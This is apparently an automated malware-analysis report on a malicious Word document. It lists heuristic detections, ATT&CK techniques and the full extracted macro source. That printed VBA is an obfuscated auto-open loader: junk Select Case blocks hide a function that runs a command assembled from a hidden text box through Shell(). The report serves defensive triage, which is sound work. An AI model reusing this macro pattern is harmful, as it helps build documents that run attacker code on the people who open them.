MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary code. Heuristics also indicate suspicious invocations of 'cmd.exe' and references to 'PowerShell', suggesting the macro is designed to download and execute a second-stage payload. The specific family is not identifiable from the provided evidence.
Heuristics (10)

- ClamAV: Doc.Malware.Sonbokli-6786376-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Sonbokli-6786376-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA. Matched lines in script:
    Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
    otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
    Select Case zkbUQkjGbBDiVRYfMOI
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched lines in script:
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    GiIvHcf
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    - http://www.iec.ch (in document text, OLE body)
    - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9931 bytes |

macros.bas details:
- SHA-256: a15e8c34622087857b9938c39724f15199ccadab7275178c6b9f6a986519dfd0
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely. 265 of 308 identifiers look randomly generated (e.g. 'IDERijbrjplIvitQQCLbjqwH'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "AiliVFBnpQBWf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
GiIvHcf
End Sub
Attribute VB_Name = "jCrccuGihAQA"
Function GiIvHcf()
On Error Resume Next
Select Case uiBizvUWjWiYSNqvNtF
Case 211762241
ZvlSHSObvElzChPUMvBiqXlm = fTOcpoozZUnPPpcFunRtZQfa
AzDBHBJzVczAzFQzBdM = Log(EwFYYvkTsYPnnAoqkwR)
dQtNdFuhBwXmTzWEsi = 189480325
RpGzNLMwRZMFLtzo = svTBCSwAcUoikz
Case 39275106
FBoJwzSswQbkRbZBiB = 341471985
JKPXKwlqYUhcGmFrJiGsc = Log(EmqMiAvnwjwWJvmRzzO)
UbjzdfVhrDuHGiFdjwN = 238092348
kYzikcKFsiGiBFdCqiDiNvso = Log(PbpIkBlijjDlVtCLbzYncFc)
End Select
Set apPKFipjInUBVzHdVzUW = RVpATlvTBOJwMiumbZz
Select Case tRMziBszBzUfDqRSVZtRtJ
Case 327569417
oljBGZGbAUuUQmKj = YYQYRYoNGptiUzkT
JtSqsbqtfiwwBiPJEUkhnWMu = Log(zkNsfXKBQdQRWjwZimpsQE)
iYPczmLnjXCsrdA = 338269233
lvkFwsionHJjWBXv = jUQuKPEqjtTnEwiniGVU
Case 6686848
fhoLiCDKVfzNujjQbjfO = 94362220
OBiKivrvBacCpjGwkBmZXopr = Log(wEOfpomRfSndUY)
SaiWkrqzJcvdcoc = 174944361
rIjrdQMmqlJQSVQd = Log(HwJSGKHEECtKKdCsclLr)
End Select
Set oKRktGjjrHfzzjjQs = zZnYNSbjHHYqjEmOSlsiM
Select Case IZZLRnBBKVJOwhQdEYCNfBU
Case 226235697
KJppoZolLApofcnW = rTcCAvqaTJhLMHErBGi
LVvVcnjapYwPrEJA = Log(HKNzOVPGawskwdV)
LOVXHZNOQkuNRTH = 326687805
ltwQLzAjOCoopt = aGjqodwiwwiiaBoGrvhLjYs
Case 337374978
UrsXZaarzmLnRJanL = 1678958
cSaiavztIhLBOhYTm = Log(KXYInaPdTZlGXYY)
WwuMScbhSJokwGspohA = 189700483
UfzPwbXHBKndnKaYZnivrqd = Log(ijNhwSpXvhBTvwVADaQzAH)
End Select
Set vSROuShCiCMlQOq = jUQhGJHccRirQZim
Select Case CYbWSLGdvrtmpNsolrw
Case 81896631
fkZmwIwvQSqdIui = TCZvKziFTLwUiCG
VWXoCjUCJhfYDIjTKjRo = Log(QuiCTSmMcNOMKIlWtFj)
XmcSJCKicJCkRHEbpmjRh = 280516889
URLsAuwQbiGBiSPsQHHj = KdvDDKhHWSBjFHBzK
Case 68298671
jtbBLGaJZtSJZHOKnQpwk = 96834096
FQEUYKOuGzXDZjb = Log(zdAIOEIbZrzOhVNzRkWlG)
BzLwLLCDobLjrTjGuBHdv = 220835322
ANljYlpNpdLcBzPs = Log(ZVCVCBduPLpVicqTmKlZciRz)
End Select
Set VCjqiJfIKEZfrzMIo = azsKAUIPmiTUvDC
Const DwNpiWpA = 0
Select Case lVwlVOfIYfPvML
Case 312551555
FCuRJrUZHOwzvmHj = ZzvQZPMtiHKMIHI
uwfivtuAXiHQiMlXjnnN = Log(tjniYbkJNzHqTBqcENfDvtuI)
LVVnjVTuiBPrwWSKqKfzZOKv = 305664991
ZHKEAlimMFOWjinvoAa = IqNtEjPIWwLatFvMjZAdN
Case 67441472
MvUdBMiaKUJTitRA = 111466308
WQPuodbibLOzzXzjAz = Log(FOwrWAGjmMSSZjHquuSHq)
SkSLLWlVCsTQLH = 170518531
tuhtpVItpPqhDliqtCw = Log(ZLojwRKZwJYzQWBY)
End Select
Set wNwcZWvjERQKdXILOwh = wvYLjufrqQhkKQw
Select Case rptbBCRRihSiai
Case 60944573
XnkDstXtTwXfwqddki = iznlLKQHoOjXnUirqAoKzS
IFflVoEozrqiXj = Log(YscmifkYjLRzmc)
XrMzfjfZuSkZlfzpHHobwiLk = 138290136
jvaDpRMBUzSXDWsThTz = wtmVKrwAzpfciHA
Case 238460256
qdSNjLzXjERjcArmPZnJEtzT = 76948995
iTqtwVIUqqfsPh = Log(wbnjRWoopPhNbuzfzBhjih)
IwaIJBGXKFUGRKmufqfAdO = 56865580
ZtKfqiBKQkfkrNfmjsXHG = Log(fVMHBqzhMtnsjQrajcEJpj)
End Select
Set CCSKsRlqAalNoTjhKLjY = zwiPvILvDwwwqKEifGPaD
Select Case vzNqVzoNGQNPHLvbXZbGjz
Case 113748171
ZFwdmZZPHYfUwpbtYh = IDERijbrjplIvitQQCLbjqwH
fbchzhizDJQUnOwKipZWQ = Log(lEYLqMFPREwjCEwJlICIs)
dwdoOQzAZlSvpYJmqVu = 263425614
MYDLsLZEQTIrMbchCwoRRiK = HOazzRhOEiRXZdVEY
Case 317662200
RJDdzhFoXFWZhNm = 25750100
lZEwmuniJEHZcktVVtHD = Log(dStdKIiIjKmZsTwrKiPQw)
cwOuVcDMUfArIGLVclFVau = 135286722
kQuiKOrnnppvPP = Log(FEXpHYAKrfpCiKdNidOKEi)
End Select
Set BFnMESRPFNzzQCENbjG = wVLNcKcHSBFjXf
Select Case ujKHAHpoLmDwRwOtmKKuYHiC
Case 52461296
unfuZBCfDvuMzaVr = ZqBwDuEFflLbnAHzoN
IQNCwmtTzZMkYj = Log(JMGOqsaotPrEPunNINUjEM)
FKKaFjSBmuBrutaWIibTmE = 226726014
ZMMEWEzhzYAEfSUIbNEJ = CsUirLAcsBAbhBtTO
Case 205701779
zUuVsVqqNTsYAYOXTsVis = 322251076
EXzcwQboMiWMtH = Log(bNBVmJzcACTdZbsApA)
pwtssZmifqiMUPzRI = 195846377
KuFuzaimBNUijMdSXh = Log(IvAiTmVqwOcJkWSqVk)
End Select
Set uSNmlQLHwArzZj = UbJQlHdjjYYEkLOWHhTnCv
Select Case YlDWTLoHGrjnlMoihiaR
Case 71876279
tBvtSiDHYAchwEwMDK = GpKRtzbXoTODsRCrBbZt
EwSiKEOjjViPnDh = Log(jBwrKOnKwkQwMwldRYCqr)
jtMnEwjnFNUJSZdCvpLIm = 173795293
SWnkAwOBqqARDiWKpaIiCb = iLAPdMijwJFuRR
Case 92173373
prMiSSHaXYfWidwlrTIYA = 228422692
oMHDIzjFsbrTmqzkMDZrE = Log(IATMTDwIpiGGXRLOwcnSm)
rKJutiwVaqjGDHkvijHjmIM = 216434472
fZzEzDluNJIDYJPMT = Log(PZQODdCwHLDIizc)
End Select
Set OIwQdnvMpzbsFWrXSAw = BQVUBwwarFbLbwu
FJiHDJoBvaI = AiliVFBnpQBWf.TextBox1 + iciEZ + KtlTf + SrFKGM + PVTdz + UUkWQQIb + BUawmiO + JGWwUjoA + GXLXZjN + iUbLi + jpjlu + cHJmiQ
Select Case GjuaofTcPWMGpQjUlpIpkd
Case 185276828
dYAidFWwcuAUNX = XtMCptkWviKLqj
EcEuzQfozJAQivPO = Log(NolwYbmHsBFATtf)
QqYPTaksFMtpcFbjP = 20969943
CvPfBSmEOZnfPVAOErwnnEsq = hwinZZlQvcUALWzj
Case 141964255
SSjiUcrXpQQLwCZTTV = 54732018
pABPTsfOtUBGRiaXi = Log(cBwCjVAkiSarCb)
EjRRRKczcdUPJtPbCoQ = 298824932
VmQjPiNNoBSZhNC = Log(FNtAETYPGqrPqXD)
End Select
Set iRitAlBbOkocCpcfMSwaWt = BOBaZrwWQwfrPi
Select Case soTDKucXliYCMWWFznsaril
Case 39353978
pVaFKmNwpFpzppuYzdWScOi = kTtAECODNLUYBSa
LEXQjFHzwCrAPnPbnSUrtMtm = Log(mmiVVXhCaHYqScfLvCCKOoZ)
tljzjCwKkZtTdccfKzofrkUq = 272859816
zKrbcwMibknjTYJNFsiL = SaWAQzuEIRsICEoTJzvGu
Case 6284503
radQWdfcIdzfjUbLwSiTTub = 111568322
UuwvmFnRifZniXadok = Log(FYEwhlwoQhZwzMwBiijV)
KNBpBYQuDqiJzLuQwOK = 273058841
WkJiaalWruIPGvKDI = Log(MjtNqumCBClmTWjHndsH)
End Select
Set wiYLvWuqQkMnizIWJtO = YZjkFbliwIhKBEOBVBuYrLkR
Select Case liQqczZjMqJlPNriiJuElFi
Case 48292880
fzoPaROVmcwHoSY = QpDjtwDJHGqBWHfAI
wCkTmZvPdkuatrVmVPaXP = Log(tiHTbMziwwwGVWhzDiodU)
PhMwfkmQZkSOJFLSzi = 107815517
nwbnVzEXMwjlMaPaGchOsjWN = GMbmkjGNWfRFZdfjODdBjC
Case 229833539
kMVBBFHbOwOmclcPcYqvwV = 218895407
BiictMIEdlBXKFLQYpraOsDd = Log(NYHLnsOiWzSbiiBqKJr)
EEXMaXIiGkIfABfnAtqtn = 296723620
FtotHpkEjMuWIAvlQjkYmr = Log(bcCOqQTwwLQSTldBpWfYTG)
End Select
Set XmEHZJCUBNGNQEaunQNz = ricAnhuCGSUUwfcl
Select Case jwzpVQCAzdJKkhXG
Case 46771868
rSBKwNzOJijKNLAQD = OiIFvMDaARdXjcPAw
JVwlpGGTTmPwJUdEsYImWpG = Log(NhlmwEvNPJGhUctCwct)
KBIJtfjrrJUUPZXIV = 135102298
OqCjzNwkPfGnuvoNMZ = sTUEVFolSuFkjiGiaHS
Case 60937234
zvULkWaYaMLjucCtmhdKcdpK = 305824814
JnROGtPjuYAskiOMrit = Log(lCEkoaowTUFKRK)
mHMFRTOhdttwvvPl = 48367220
soHijZfFQMaSqbaVb = Log(fcciXUaruitCEiz)
End Select
Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
Select Case zkbUQkjGbBDiVRYfMOI
Case 213553833
MjWLVLlZwwPbYOoBAoZiIRa = jZDvqjUCOjnDFIuZzhdEoGwC
dLaizkvGXfvIqjObMNrbl = Log(rtAkaoVKadAMMYtUQwrzhdwQ)
wOcctFbwhThiNJG = 238962951
ESIiWqhswvjnOOuj = cathjXYNfEMlDmlMUYjI
Case 194425028
XvkzJsKSFnzkhjrjYuj = 110884928
mVGsJwaupOazBCzzjOjCMzY = Log(SEEVoAlZMklZiEAtkYPZYl)
itiojCOimwTaEtFGodAm = 111869160
YTfNmSojzNhYZcFME = Log(wFwcKdwAfSbwYwPNUP)
End Select
Set TPwqDzGsfTcAcYd = LSwIBQmnWIDpiJMHpDkHCP
Select Case FRjiwhfsuzlmbuYhGYj
Case 165473779
HYHBqDWYPlNWlQqlcdG = tBXfSoEiCwlwVAwtchFiIUf
YPqiiwivdiiFAbjCw = Log(VRzQBkRzJuYbhYWJHCwazG)
qTmVssAwDfVwOOHOFM = 243232673
jXBAFjrTjDYoPzJzOPZFIw = vMaHuAosNOTkSRmPIA
Case 215693894
zHjjREKzqnfimCFnf = 184445548
TsLLZvMqfczQEbfVofqqqppC = Log(iowQLwjjDMZowHoENiW)
XbDHjRIplHdDIlqHNaTiPjA = 96688268
hrYClcLSMCHlqkt = Log(uvwiWfKRhrnKranaoBwajn)
End Select
Set iSkwjjVXpZoVoEfjCjHUuoAa = PjwomTGGvRQlibiLTwlDF
Select Case vfUpGjtUcoEJdzDmfDrlL
Case 79390792
FbBKSVvztWpvjCqKauBO = ZiNcuosEnBZjzPOEYbwjqK
oDTkotRqKzsjzohYjDsFVP = Log(kmbFCTCivOrYZaED)
WKPlGjRPqDSdwFQZ = 282489848
zNnPXHPzRFQIzczhiKzad = KpLQkEzIaziqHq
Case 154770044
nIWJRMziFpdRXGZ = 106030876
uCwDGWKAJiQZGVI = Log(bXqETmwpcKuajlUZ)
kNoZDjlLJHhiIwUVH = 316186135
iLmHEIawbjTYJrHVIUkXq = Log(sKiQHULaFZpmqGw)
End Select
Set jRdkKcpjXrBdMBW = rdTbdnBGkBiuiXAAWDk
Select Case TwJSozjKPHBZhHhw
Case 324122818
XvUJjnaDwHBqTlUUlBsIYhfh = kfKpZFYcDEVrJPWs
zYJZoPFNWfGpXpPnzwIPN = Log(CcNPhzcblVPniHXnwPE)
CZRnjPFDMTOdWaVjLZi = 40075943
vtlZjHIPKzsKmWdLaiRtY = SHmQHlrbWhwqHfjOw
Case 53767800
nCTVSkEsVlqQMMjbdnSzXYid = 71002413
vPwiMlJwkNwlTjDt = Log(qfQmdaDCadJZPTqLGo)
tqYFGPcTdsTmviCrztZSou = 184323825
HAWVtIaNrPzfRaJWBHaKH = Log(NvMcsRjWAzOnzGtHZURFvff)
End Select
Set ZXjDRjTRiQmaIRPJjU = zRicDduiFsBvhQpCV
End Function